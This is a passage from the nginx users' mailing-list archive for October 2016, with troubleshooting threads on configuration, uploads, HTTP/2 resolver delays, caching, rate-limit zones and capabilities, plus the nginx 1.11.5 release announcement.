(Edho Arief) Date: Mon, 10 Oct 2016 15:53:58 +0900 Subject: Index fallback? In-Reply-To: References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> Message-ID: <1476082438.2478106.750867537.6C84B5C0@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 15:50, Nurahmadie Nurahmadie wrote: > > > > > > Still need more locations, but independent to directories you want to > > > access: > > > > > > > > > server { > > > listen 7770; > > > root /tmp; > > > autoindex on; > > > autoindex_format json; > > > } > > > > > > server { > > > listen 80; > > > server_name localhost; > > > index index.html; > > > root /tmp; > > > > > > location ~ /.*?[^/]$ { > > > try_files $uri @redir; > > > } > > > > > > location @redir { > > > return 301 $uri/; > > > } > > > > > > location ~ /$ { > > > try_files $uri"index.html" @reproxy; > > > } > > > > > > location @reproxy { > > > proxy_pass http://localhost:7770; > > > } > > > } > > > > > > > Thanks, but that's even longer than my ifs. Also one `server { }` and > > one regexp location too many. > > > > Ah, sorry I thought it's obvious that the other server is just served as > dummy example, > also I have this tendency to avoid `if` as much as possible, so yeah > Looking again, that's actually the solution: location / { location ~ /$ { try_files $uri/index.html @dirlist; } } Thanks. From nginx-forum at forum.nginx.org Mon Oct 10 07:41:13 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Mon, 10 Oct 2016 03:41:13 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161009160507.GW11677@daoine.org> References: <20161009160507.GW11677@daoine.org> Message-ID: Hello Francis, thank you for response. I just want to transfer big file on Nginx server inside POST request. I use method from: https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend Whole my analysis and expectations are based on this article. Unfotunately this "clientbodyinfileonly" functionality is not well documented so I'm not sure how exactly ok scenario from Nginx POV should look like. I just know that my file is not transfered and not saved on server side. Regards, Dawid Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270145#msg-270145 From nginx-forum at forum.nginx.org Mon Oct 10 08:29:27 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Mon, 10 Oct 2016 04:29:27 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: <20161009194134.GX11677@daoine.org> References: <20161009194134.GX11677@daoine.org> Message-ID: Hi Francis, Wow, this gets stranger......who have cracked it for me....but i have no idea how or why it got there! there were symlinks in website1.com and website3.com roots public directories for phpmyadmin - symlinked to /usr/share/phpmyadmin. I never noticed them though as they didnt appear as a folder when browsing the public folder structure with an FTP program. Only doing as ls on /website1.com/public did it show it. Removed symlink to /usr/share/phpmyadmin in the 2 root folders and now i get a 404 page if navigatng to /phpmyadmin.....Perfect! :-) As you can probably tell im primarily a Windows admin and Linux knowledge is limited, thanks to people like yourself though im learning! PS - Index.php does exists in the public root folders - but the file belongs to WordPress. PPS - You say: > if ($http_cookie ~* ?PHPSESSID"){ >If that is a copy-paste of the config file, then it probably won't match >some things that you would want it to. Could you elaborate on this please if you have time? Thankyou for your time and help Francis, its most appreciated. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270146#msg-270146 From nginx-forum at forum.nginx.org Mon Oct 10 09:29:45 2016 From: nginx-forum at forum.nginx.org (bobykus) Date: Mon, 10 Oct 2016 05:29:45 -0400 Subject: mail-proxy starttls and ssl on Message-ID: <6e552de247b17a8327e0d1452a1c7978.NginxMailingListEnglish@forum.nginx.org> The manual Setting up SSL/TLS for a Mail Proxy https://www.nginx.com/resources/admin-guide/mail-proxy/ says Enable SSL/TLS for mail proxy with the ssl directive. If the directive is specified in the mail context, SSL/TLS will be enabled for all mail proxy servers. You can also enable STLS and STARTTLS with the starttls directive: mail { ... ssl on; starttls on; ... } However if I add both, nginx: [warn] "ssl" directive conflicts with "starttls" in /root/nginx.conf:79 nginx: configuration file /root/nginx.conf test failed How comes? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270147,270147#msg-270147 From chris.west at logicalglue.com Mon Oct 10 11:34:18 2016 From: chris.west at logicalglue.com (Chris West) Date: Mon, 10 Oct 2016 12:34:18 +0100 Subject: 5s hangs with http2 and variable-based proxy_pass Message-ID: If you enable http2, our proxy setup develops 5s hangs, under load. This happens from at least Chrome/linux, Firefox/linux and Edge/win10. Any suggestions on how to further diagnose this problem, or work out where this "5 second" number is coming from? Full reproduction config and debug logs are attached, but I don't understand the debug logs. This isn't always reproducible, but happens frequently. Changing browser, restarting nginx, ... doesn't cause it to be immediately reproducible. The proxying is based on a variable: resolver 8.8.4.4; location ~/proxy/([a-z-]+\.example\.com)$ { proxy_pass https://$1/foo; ... This is easiest to see when a number of these urls are hit from a single page, e.g. ... etc. The observed effect is that exactly eight requests will be serviced, then there will be a 5s wait, then another eight will be serviced, then hang, etc. until all requests have been serviced. Reproduced on Ubuntu 16.04's nginx packages (1.10 based), with default config, and this sites-enabled/default full config: server { listen 443 default_server ssl http2; ssl on; ssl_certificate /etc/letsencrypt/live/.../fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/.../privkey.pem; root /var/www/html; index index.html index.htm; server_name _; location / { try_files $uri $uri/ =404; } resolver 8.8.4.4; location ~/proxy/([a-z-]+\....)$ { proxy_pass https://$1/index.txt; proxy_http_version 1.1; proxy_connect_timeout 13s; proxy_read_timeout 28s; } } The 5s pause is evident in the debug log. However, the debug log *also* shows that the upstream requests have been generated, which means that all the requests have been received. Pause: 2016/10/10 11:17:31 [debug] 4058#4058: *238 process http2 frame type:3 f:0 l:4 sid:17 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 RST_STREAM frame, sid:17 status:8 2016/10/10 11:17:31 [debug] 4058#4058: *238 unknown http2 stream 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete pos:00007F536315501D end:00007F536315501D 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 read handler 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: 13 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: -1 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_get_error: 2 2016/10/10 11:17:31 [debug] 4058#4058: *238 process http2 frame type:3 f:0 l:4 sid:13 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 RST_STREAM frame, sid:13 status:8 2016/10/10 11:17:31 [debug] 4058#4058: *238 unknown http2 stream 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete pos:00007F536315501D end:00007F536315501D 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 read handler 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: 13 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_read: -1 2016/10/10 11:17:31 [debug] 4058#4058: *238 SSL_get_error: 2 2016/10/10 11:17:31 [debug] 4058#4058: *238 process http2 frame type:3 f:0 l:4 sid:5 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 RST_STREAM frame, sid:5 status:8 2016/10/10 11:17:31 [debug] 4058#4058: *238 unknown http2 stream 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete pos:00007F536315501D end:00007F536315501D 2016/10/10 11:17:36 [debug] 4058#4058: *238 http upstream resolve: "/proxy/nettesto....?" 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 94.23.43.98 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 2001:41d0:2:2c62:: 2016/10/10 11:17:36 [debug] 4058#4058: *238 posix_memalign: 000055B45897FDB0:4096 @16 2016/10/10 11:17:36 [debug] 4058#4058: *238 get rr peer, try: 2 2016/10/10 11:17:36 [debug] 4058#4058: *238 get rr peer, current: 000055B45897FE18 -1 2016/10/10 11:17:36 [debug] 4058#4058: *238 stream socket 12 Upstream requsets: 2016/10/10 11:17:31 [debug] 4058#4058: *238 http proxy header: "GET /index.txt HTTP/1.1^M Host: nettestz.fau...^M But they're not served by the backend until much later, at [10/Oct/2016:11:17:46 +0000] in this case (according to the backend's nginx access logs). The host names mentioned in the debug log are public and are valid until I pull them down, but I don't know if this is reproducible with multiple people accessing it (and you can probably guess why I stripped them from the email body). -------------- next part -------------- A non-text attachment was scrubbed... Name: debug.log.gz Type: application/x-gzip Size: 15622 bytes Desc: not available URL: From vbart at nginx.com Mon Oct 10 11:58:36 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 10 Oct 2016 14:58:36 +0300 Subject: 5s hangs with http2 and variable-based proxy_pass In-Reply-To: References: Message-ID: <8585362.MJTgDEinSn@vbart-workstation> On Monday 10 October 2016 12:34:18 Chris West wrote: > If you enable http2, our proxy setup develops 5s hangs, under load. > This happens from at least Chrome/linux, Firefox/linux and Edge/win10. > > Any suggestions on how to further diagnose this problem, or work out > where this "5 second" number is coming from? Full reproduction config > and debug logs are attached, but I don't understand the debug logs. > > > This isn't always reproducible, but happens frequently. Changing > browser, restarting nginx, ... doesn't cause it to be immediately > reproducible. > [..] > 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete > pos:00007F536315501D end:00007F536315501D > 2016/10/10 11:17:36 [debug] 4058#4058: *238 http upstream resolve: > "/proxy/nettesto....?" > 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 94.23.43.98 > 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to > 2001:41d0:2:2c62:: [..] Looks like the delay is created by your resolver (8.8.4.4 as set in your configuration). Please, also check the documentation and don't use any public DNS in the resolver directive: http://nginx.org/en/docs/http/ngx_http_core_module.html#resolver | To prevent DNS spoofing, it is recommended configuring DNS servers in a properly | secured trusted local network. wbr, Valentin V. Bartenev From chris.west at logicalglue.com Mon Oct 10 12:30:38 2016 From: chris.west at logicalglue.com (Chris West) Date: Mon, 10 Oct 2016 13:30:38 +0100 Subject: 5s hangs with http2 and variable-based proxy_pass In-Reply-To: <8585362.MJTgDEinSn@vbart-workstation> References: <8585362.MJTgDEinSn@vbart-workstation> Message-ID: You are correct, the DNS server (Google Public DNS) isn't responding to the requests. I don't know if this is because the UDP packets are getting lost due to the flood generated, or if it thinks it's an attack. Ramming dnsmasq in the middle fixes it, but I don't really understand why, as the test only generates 26*2=52 requests, and dnsmasq is supposed to have a default concurrency of 150. Both generate, as far as I can see, identical dns packets. dnsmasq takes about 200ms to transmit them, whereas nginx only takes about 30ms, maybe that's sufficient. At least this isn't something scarily wrong with the http2 support, which was what was worrying me. Cheers! On 10 October 2016 at 12:58, Valentin V. Bartenev wrote: > On Monday 10 October 2016 12:34:18 Chris West wrote: >> If you enable http2, our proxy setup develops 5s hangs, under load. >> This happens from at least Chrome/linux, Firefox/linux and Edge/win10. >> >> Any suggestions on how to further diagnose this problem, or work out >> where this "5 second" number is coming from? Full reproduction config >> and debug logs are attached, but I don't understand the debug logs. >> >> >> This isn't always reproducible, but happens frequently. Changing >> browser, restarting nginx, ... doesn't cause it to be immediately >> reproducible. >> > [..] >> 2016/10/10 11:17:31 [debug] 4058#4058: *238 http2 frame complete >> pos:00007F536315501D end:00007F536315501D >> 2016/10/10 11:17:36 [debug] 4058#4058: *238 http upstream resolve: >> "/proxy/nettesto....?" >> 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to 94.23.43.98 >> 2016/10/10 11:17:36 [debug] 4058#4058: *238 name was resolved to >> 2001:41d0:2:2c62:: > [..] > > > Looks like the delay is created by your resolver (8.8.4.4 as set in your configuration). > Please, also check the documentation and don't use any public DNS in the resolver > directive: http://nginx.org/en/docs/http/ngx_http_core_module.html#resolver > > | To prevent DNS spoofing, it is recommended configuring DNS servers in a properly > | secured trusted local network. > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From francis at daoine.org Mon Oct 10 16:10:17 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 10 Oct 2016 17:10:17 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: <20161009194134.GX11677@daoine.org> Message-ID: <20161010161017.GA11677@daoine.org> On Mon, Oct 10, 2016 at 04:29:27AM -0400, mrast wrote: Hi there, > there were symlinks in website1.com and website3.com roots public > directories for phpmyadmin - symlinked to /usr/share/phpmyadmin. It's good that you found an answer that works for you. > > if ($http_cookie ~* ?PHPSESSID"){ > >If that is a copy-paste of the config file, then it probably won't match > >some things that you would want it to. > > Could you elaborate on this please if you have time? ? is not " You probably want "PHPSESSID", like in the other server block. All the best, f -- Francis Daly francis at daoine.org From francis at daoine.org Mon Oct 10 16:16:22 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 10 Oct 2016 17:16:22 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: References: <20161009160507.GW11677@daoine.org> Message-ID: <20161010161622.GB11677@daoine.org> On Mon, Oct 10, 2016 at 03:41:13AM -0400, yurai wrote: Hi there, > thank you for response. I just want to transfer big file on Nginx server > inside POST request. I use method from: > https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend > > Whole my analysis and expectations are based on this article. I think that at least one of us is confused. You have "client" - "nginx" - "backend". That document is about getting a file from "client" to "nginx", and then telling "backend" what filename is used on "nginx". If "backend" wants to access the file, that is out of the scope of that document. ("backend" gets the filename, and should presumably do a separate "open" on the shared filesystem, or have a separate transfer to be able to read the file.) > Unfotunately this "clientbodyinfileonly" functionality is not well > documented so I'm not sure how exactly ok scenario from Nginx POV should > look like. I just know that my file is not transfered and not saved on > server side. The file should be transferred to the nginx server. If that happens, the nginx side is doing what it was configured to do. The functionality is documented at http://nginx.org/r/client_body_in_file_only Cheers, f -- Francis Daly francis at daoine.org From dmiller at amfes.com Mon Oct 10 17:19:55 2016 From: dmiller at amfes.com (Daniel Miller) Date: Mon, 10 Oct 2016 10:19:55 -0700 Subject: invalid url - my config or invalid request? Message-ID: My site is generally doing exactly what I want. Periodically I'll see some errors in the log. I'm trying to determine if these indicate problems in my config, or potential attacks, or simply a broken client. The last few lines in my log: 2016/10/05 14:38:37 [error] 17912#0: *17824 invalid url, client: 195.154.181.113, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0" 2016/10/05 19:47:27 [error] 17912#0: *18315 invalid url, client: 169.56.71.56, server: amfes.com, request: "GET / HTTP/1.0" 2016/10/08 13:46:21 [error] 17910#0: *27413 invalid url, client: 212.83.162.138, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0" 2016/10/09 18:05:30 [error] 17912#0: *32588 invalid url, client: 211.1.156.90, server: amfes.com, request: "HEAD / HTTP/1.0" Clients I control have no problem reaching the root or the robots.txt file - so what is this telling me? -- Daniel From vbart at nginx.com Mon Oct 10 17:43:08 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Mon, 10 Oct 2016 20:43:08 +0300 Subject: invalid url - my config or invalid request? In-Reply-To: References: Message-ID: <2136505.JouzbVE9h5@vbart-workstation> On Monday 10 October 2016 10:19:55 Daniel Miller wrote: > My site is generally doing exactly what I want. Periodically I'll see > some errors in the log. I'm trying to determine if these indicate > problems in my config, or potential attacks, or simply a broken client. > > The last few lines in my log: > 2016/10/05 14:38:37 [error] 17912#0: *17824 invalid url, client: > 195.154.181.113, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0" > 2016/10/05 19:47:27 [error] 17912#0: *18315 invalid url, client: > 169.56.71.56, server: amfes.com, request: "GET / HTTP/1.0" > 2016/10/08 13:46:21 [error] 17910#0: *27413 invalid url, client: > 212.83.162.138, server: amfes.com, request: "HEAD /robots.txt HTTP/1.0" > 2016/10/09 18:05:30 [error] 17912#0: *32588 invalid url, client: > 211.1.156.90, server: amfes.com, request: "HEAD / HTTP/1.0" > > Clients I control have no problem reaching the root or the robots.txt > file - so what is this telling me? > The official nginx build cannot produce such messages. They likely come from 3rd-party module or patches you're using. wbr, Valentin V. Bartenev From nginx-forum at forum.nginx.org Mon Oct 10 19:14:33 2016 From: nginx-forum at forum.nginx.org (gg4u) Date: Mon, 10 Oct 2016 15:14:33 -0400 Subject: cache all endpoints but one: nginx settings In-Reply-To: <20161004162825.GM73038@mdounin.ru> References: <20161004162825.GM73038@mdounin.ru> Message-ID: <30c5aa0d4b5d2f7241d7f5b923c90f51.NginxMailingListEnglish@forum.nginx.org> thank you Maxim, I ll try with your suggestions. So basically, if I have a "production" server and a proxy server in front of it, I just need cache on the proxy server (http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_valid) , and not cache responses on the production server? I have this setting on production server: # Set Cache for my Json api location ~* \.(?:json)$ { expires 1M; access_log off; add_header Cache-Control "public"; } But if I am using a proxy server it is useless, correct? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270058,270167#msg-270167 From nginx-forum at forum.nginx.org Mon Oct 10 19:34:50 2016 From: nginx-forum at forum.nginx.org (gg4u) Date: Mon, 10 Oct 2016 15:34:50 -0400 Subject: cache all endpoints but one: nginx settings In-Reply-To: <30c5aa0d4b5d2f7241d7f5b923c90f51.NginxMailingListEnglish@forum.nginx.org> References: <20161004162825.GM73038@mdounin.ru> <30c5aa0d4b5d2f7241d7f5b923c90f51.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7abc6b22246e2e63b9408b56e7ad27bf.NginxMailingListEnglish@forum.nginx.org> Update about FLASK: as you indicated in: I am using errorhandler decorator, but returning a template in the handler function: @application.errorhandler(404) def error_404(e): application.logger.error('Page Not Found: %s', (request.path)) #return render_template('404.html'), 404 return render_template("404.html", error = str(e)) In this situation, it is not clear to me if nginx will read a 200 response, for actually the template 404.html is found, or the 404 error, handled by the decorator. Actually, with the suggestions from: http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_valid I can see: /api/_invalidpage returned header: X-Proxy-Cache: MISS and it is not cached now. while /_invalidpage/ (the page a user will see for that specific page) returned X-Proxy-Cache: HIT I would like to cache the html template but not the 404 api response. I think now is correct but would appreciate a clarification on how a template is handled inside handleerror in flask, to better understand how things works. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270058,270168#msg-270168 From darbas.mindaugas at gmail.com Tue Oct 11 11:26:50 2016 From: darbas.mindaugas at gmail.com (=?UTF-8?Q?Mindaugas_Bernatavi=C4=8Dius?=) Date: Tue, 11 Oct 2016 11:26:50 +0000 Subject: Rate limiting zone size question Message-ID: Greetings group, I have posted the same questions elsewhere, hope its not against the policy. One of the modules that is often employed *ngx_http_limit_req_module* has the following precaution in the documentation: *If the **zone storage is exhausted, the server will return the 503* *(Service Temporarily Unavailable) error to all further requests.* *Questions:* *----------------------------------------------------------------------* 1. It is interesting for me how is the *zone *defined? I know that the underlining data structure is a red-black tree. But what comprises the entire zone record? All the information needed for the rate limit? 2. I have multiple users on the website served by nginx. And the zone size is 1m. How do I determine the lower bound of the zone for a given unique ip count? 3. After what time is the zone memory released? If I have: rate=1r/m; does that mean that all the records will have to be kept for 1 minute to do the accounting, then cleared so that memory in zone could be renewed? *Some code considerations:* *----------------------------------------------------------------------* Trying to look at *ngx_http_limit_req_module.c *I saw only configure time error being thrown when the zone size is specified incorrectly: *if (size < (ssize_t) (8 * ngx_pagesize)) { * *ngx_conf_log_error(NGX_LOG_EMERG, cf, 0, "zone \"%V\" is too small", &value[i]); * *return NGX_CONF_ERROR;* * }* (8 * ngx_pagesize), if I'm not mistaken is 8 * 4096 = 32768 I confirmed experimentally that the smallest size is indeed 32768 bytes = 32KB. *----------------------------------------------------------------------* The function contains some interesting data: *static ngx_int_t ngx_http_limit_req_lookup(ngx_http_limit_req_limit_t *limit, * *ngx_uint_t hash, * *ngx_str_t *key, * *ngx_uint_t *ep, * *ngx_uint_t account)* * node = ngx_slab_alloc_locked(ctx->shpool, size);* * if (node == NULL) {* * ngx_log_error(NGX_LOG_ALERT, ngx_cycle->log, 0,* * "could not allocate node%s", ctx->shpool->log_ctx);* * return NGX_ERROR;* * } * I suppose this is the error thrown when zone size limit is reached? Would really appreciate your help on this issue. *----------------------------------------------------------------------* Also, I calculated the size of each node of the rb tree and it seems to only comprise 44 bytes. 0022 struct ngx_rbtree_node_s {0023 ngx_rbtree_key_t key ; ===> 4 bytes0024 ngx_rbtree_node_t *left ; ===> 8 bytes (pointer size on 64bit)0025 ngx_rbtree_node_t *right ; ===> 80026 ngx_rbtree_node_t *parent ;===> 80027 u_char color ; ===> 80028 u_char data ; ===> 80029 }; -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Oct 11 15:32:34 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 11 Oct 2016 18:32:34 +0300 Subject: nginx-1.11.5 Message-ID: <20161011153234.GC73038@mdounin.ru> Changes with nginx 1.11.5 11 Oct 2016 *) Change: the --with-ipv6 configure option was removed, now IPv6 support is configured automatically. *) Change: now if there are no available servers in an upstream, nginx will not reset number of failures of all servers as it previously did, but will wait for fail_timeout to expire. *) Feature: the ngx_stream_ssl_preread_module. *) Feature: the "server" directive in the "upstream" context supports the "max_conns" parameter. *) Feature: the --with-compat configure option. *) Feature: "manager_files", "manager_threshold", and "manager_sleep" parameters of the "proxy_cache_path", "fastcgi_cache_path", "scgi_cache_path", and "uwsgi_cache_path" directives. *) Bugfix: flags passed by the --with-ld-opt configure option were not used while building perl module. *) Bugfix: in the "add_after_body" directive when used with the "sub_filter" directive. *) Bugfix: in the $realip_remote_addr variable. *) Bugfix: the "dav_access", "proxy_store_access", "fastcgi_store_access", "scgi_store_access", and "uwsgi_store_access" directives ignored permissions specified for user. *) Bugfix: unix domain listen sockets might not be inherited during binary upgrade on Linux. *) Bugfix: nginx returned the 400 response on requests with the "-" character in the HTTP method. -- Maxim Dounin http://nginx.org/ From kworthington at gmail.com Tue Oct 11 17:23:33 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 11 Oct 2016 13:23:33 -0400 Subject: [nginx-announce] nginx-1.11.5 In-Reply-To: <20161011153240.GD73038@mdounin.ru> References: <20161011153240.GD73038@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.11.5 for Windows https://kevinworthington.com/nginxwin1115 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Oct 11, 2016 at 11:32 AM, Maxim Dounin wrote: > Changes with nginx 1.11.5 11 Oct > 2016 > > *) Change: the --with-ipv6 configure option was removed, now IPv6 > support is configured automatically. > > *) Change: now if there are no available servers in an upstream, nginx > will not reset number of failures of all servers as it previously > did, but will wait for fail_timeout to expire. > > *) Feature: the ngx_stream_ssl_preread_module. > > *) Feature: the "server" directive in the "upstream" context supports > the "max_conns" parameter. > > *) Feature: the --with-compat configure option. > > *) Feature: "manager_files", "manager_threshold", and "manager_sleep" > parameters of the "proxy_cache_path", "fastcgi_cache_path", > "scgi_cache_path", and "uwsgi_cache_path" directives. > > *) Bugfix: flags passed by the --with-ld-opt configure option were not > used while building perl module. > > *) Bugfix: in the "add_after_body" directive when used with the > "sub_filter" directive. > > *) Bugfix: in the $realip_remote_addr variable. > > *) Bugfix: the "dav_access", "proxy_store_access", > "fastcgi_store_access", "scgi_store_access", and > "uwsgi_store_access" > directives ignored permissions specified for user. > > *) Bugfix: unix domain listen sockets might not be inherited during > binary upgrade on Linux. > > *) Bugfix: nginx returned the 400 response on requests with the "-" > character in the HTTP method. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Wed Oct 12 01:43:12 2016 From: alex at samad.com.au (Alex Samad) Date: Wed, 12 Oct 2016 12:43:12 +1100 Subject: newbie question Message-ID: Hi I am trying to create a dynamic auth address # grab ssoid map $cookie_SSOID $ssoid_cookie { default ""; ~SSOID=(?P.+) $ssoid; } location /imaadmin/ { proxy_cache off; proxy_pass http://IMAAdmin; auth_request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; what I am trying to do is fill the variable ssoid_cookie with the cookie value for SSOID in the request or make it blank then when somebody tries to access /imaadmin make the auth request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; but i get this GET /sso/validate%3FSSOID=$ssoid_cookie&a=imaadmin HTTP/1.0 Alex From anoopalias01 at gmail.com Wed Oct 12 09:33:29 2016 From: anoopalias01 at gmail.com (Anoop Alias) Date: Wed, 12 Oct 2016 15:03:29 +0530 Subject: [nginx-announce] nginx-1.11.5 In-Reply-To: References: <20161011153240.GD73038@mdounin.ru> Message-ID: *) Feature: the --with-compat configure option. What does this do actually? On Tue, Oct 11, 2016 at 10:53 PM, Kevin Worthington wrote: > Hello Nginx users, > > Now available: Nginx 1.11.5 for Windows https://kevinworthington.com/ > nginxwin1115 (32-bit and 64-bit versions) > > These versions are to support legacy users who are already using Cygwin > based builds of Nginx. Officially supported native Windows binaries are > at nginx.org. > > Announcements are also available here: > Twitter http://twitter.com/kworthington > Google+ https://plus.google.com/+KevinWorthington/ > > Thank you, > Kevin > -- > Kevin Worthington > kworthington *@* (gmail] [dot} {com) > http://kevinworthington.com/ > http://twitter.com/kworthington > https://plus.google.com/+KevinWorthington/ > > On Tue, Oct 11, 2016 at 11:32 AM, Maxim Dounin wrote: > >> Changes with nginx 1.11.5 11 Oct >> 2016 >> >> *) Change: the --with-ipv6 configure option was removed, now IPv6 >> support is configured automatically. >> >> *) Change: now if there are no available servers in an upstream, nginx >> will not reset number of failures of all servers as it previously >> did, but will wait for fail_timeout to expire. >> >> *) Feature: the ngx_stream_ssl_preread_module. >> >> *) Feature: the "server" directive in the "upstream" context supports >> the "max_conns" parameter. >> >> *) Feature: the --with-compat configure option. >> >> *) Feature: "manager_files", "manager_threshold", and "manager_sleep" >> parameters of the "proxy_cache_path", "fastcgi_cache_path", >> "scgi_cache_path", and "uwsgi_cache_path" directives. >> >> *) Bugfix: flags passed by the --with-ld-opt configure option were not >> used while building perl module. >> >> *) Bugfix: in the "add_after_body" directive when used with the >> "sub_filter" directive. >> >> *) Bugfix: in the $realip_remote_addr variable. >> >> *) Bugfix: the "dav_access", "proxy_store_access", >> "fastcgi_store_access", "scgi_store_access", and >> "uwsgi_store_access" >> directives ignored permissions specified for user. >> >> *) Bugfix: unix domain listen sockets might not be inherited during >> binary upgrade on Linux. >> >> *) Bugfix: nginx returned the 400 response on requests with the "-" >> character in the HTTP method. >> >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx-announce mailing list >> nginx-announce at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx-announce >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- *Anoop P Alias* -------------- next part -------------- An HTML attachment was scrubbed... URL: From mat999 at gmail.com Wed Oct 12 10:01:24 2016 From: mat999 at gmail.com (Mathew Heard) Date: Wed, 12 Oct 2016 21:01:24 +1100 Subject: CAP_NET_ADMIN Message-ID: Hi All, I am stuck trying to get my nginx service which is launched via SystemD to give CAP_NET_ADMIN to its workers (required for IP_TRANSPARENT). I have tried /etc/security/capability.conf & setcap. SystemD has the permission whitelisted: CapabilityBoundingSet=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID AmbientCapabilities=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID Any advice? Regards, Mathew From mat999 at gmail.com Wed Oct 12 10:07:58 2016 From: mat999 at gmail.com (Mathew Heard) Date: Wed, 12 Oct 2016 21:07:58 +1100 Subject: Fwd: CAP_NET_ADMIN In-Reply-To: References: Message-ID: I have also tried: InheritableCapabilities=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SETGID CAP_SETUID CAP_SYS_RESOURCE and various other options without avail. ---------- Forwarded message ---------- From: Mathew Heard Date: Wed, Oct 12, 2016 at 9:01 PM Subject: CAP_NET_ADMIN To: nginx at nginx.org Hi All, I am stuck trying to get my nginx service which is launched via SystemD to give CAP_NET_ADMIN to its workers (required for IP_TRANSPARENT). I have tried /etc/security/capability.conf & setcap. SystemD has the permission whitelisted: CapabilityBoundingSet=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID AmbientCapabilities=CAP_NET_BIND_SERVICE CAP_NET_ADMIN CAP_SYS_RESOURCE CAP_SETGID CAP_SETUID Any advice? Regards, Mathew From nginx-forum at forum.nginx.org Wed Oct 12 10:28:47 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Wed, 12 Oct 2016 06:28:47 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161010161622.GB11677@daoine.org> References: <20161010161622.GB11677@daoine.org> Message-ID: <216fd4b10237c6458f868f35d5a7f2ac.NginxMailingListEnglish@forum.nginx.org> Hello, >"The file should be transferred to the nginx server." This is the whole point. With current configuration when I type curl --data-binary '@upload.txt' http://localhost/upload file is NOT transffered from client to server at all - "proxy_pass" is performed and I only get HTTP response 200. When I change my configuration (by removing whole backend configuration (s2 block) and all proxy_* directives from s1) and type same command I get HTTP 405 Not Allowed or HTTP 301 Moved Permanently. Let's ignore for the second size of my file in body. Maybe in this moment the right question is: what should I do to make my above curl command work? Regards, Dawid Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270196#msg-270196 